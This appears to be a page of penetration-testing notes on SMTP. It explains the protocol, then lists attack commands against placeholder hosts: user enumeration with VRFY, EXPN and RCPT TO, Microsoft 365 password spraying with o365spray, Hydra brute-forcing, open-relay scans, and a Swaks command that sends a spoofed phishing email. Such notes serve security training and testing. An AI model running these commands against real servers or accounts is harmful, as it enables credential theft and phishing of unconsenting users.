SMTP

ABOUT

Simple Mail Transfer Protocol (SMTP) is a protocol for sending emails in an IP network. It can be used between an email client and an outgoing mail server or between two SMTP servers. SMTP is often combined with the IMAP or POP3 protocols, which can fetch emails and send emails. In principle, it is a client-server-based protocol. Commonly it's using TCP/25 port for unencrypted SMTP, TCP/465 for encrypted, TCP/587 for SMTP STARTLS Encryption.

SMTP Servers

SMTP servers play a crucial role in preventing spam by supporting ESMTP with SMTP-Auth for authorized user-based email sending. The Mail User Agent (MUA) converts emails into headers and bodies, uploading them to the SMTP server. A Mail Transfer Agent (MTA) checks email size and spam, storing it after validation. Occasionally, a Mail Submission Agent (MSA) or Relay server validates email origin to prevent Open Relay Attacks. The MTA then searches DNS for the recipient mail server's IP address.

MUA(Client) -> MSA(Submission Agent) -> MTA(Open Relay) -> MDA(Mail Delivery Agent) -> POP3/IMAP(Mailbox)

SMTP Commands

Connect

Usually to connect to SMTP server you could use just telnet and specify port.

telnet 13.13.13.13 25

VRFY

VRFY command is used for checking if the username is valid by requesting SMTP Server

VRFY root
252 2.0.0 root

EXPN

EXPN command is same as VRFY, but if you send it a distribution list, it'll send back all users from it.

EXPN impostors-team
250 2.0.0 john@amogus.com
250 2.1.5 bob@amogus.com

RCPT TO

RCPT TO command specifies the recipient. The more times you use it, the more recipients you could find.

RCPT TO:alice
550 5.1.1 alice... User unknown

RCPT TO:bob
250 2.1.5 bob... Recipient ok

Microsoft 365

Sure here wouldn't be whole section about 365, but that's a common thing, so let's write here some basic enum techniques.

0365spray

O365spray is a tool for username enum and password spraying attack at Microsoft 365

Validate

python3 o365spray.py --validate --domain amogus.com

Username Enum

python3 o365spray.py --enum -U users.txt --domain amogus.com

Password Spraying

python3 o365spray.py --spray -U users.txt -p '1mp0st3r' --count 1 --lockout 1 --domain amogus.com

Tips2Hack

  1. Nmap - Open Relay

sudo nmap 13.13.13.13 -p25 --script smtp-open-relay -v

  1. Nmap - SMTP all scripts enum

sudo nmap 13.13.13.13 -p25 -sV -sC --script smtp* -v

  1. DIG - Mail Server enum

dig mx amogus.com | grep "MX" | grep -v ";"

  1. Host Mail Server

host -t A mail.amogus.htb

  1. smtp-user-enum script [LINK]

smtp-user-enum -M RCPT -U userlist.txt -D amogus.com -t 13.13.13.13

  1. Hydra - Password attacks

If you know user, as example "bob", don't use just username, use it with domain/email address, likebob@amogus.com

hydra -L users.txt -p 'amogus' -f 13.13.13.13 pop3

  1. Swaks - Send mail

swaks --from notifications@amogus.com --to impostors@amogus.com --header 'Subject: You have suspected of being impostors' --body 'Hi, our councel of spacemen chose by democratic voting that you are sus, so you have no other choice but to surrender and be ready for empty vastness of space. If you want to deny that, please join our chat here and explain your sus behaviour: https://impostor-chat-court.com' --server 13.13.13.13
PreviousRDPNextIMAP / POP3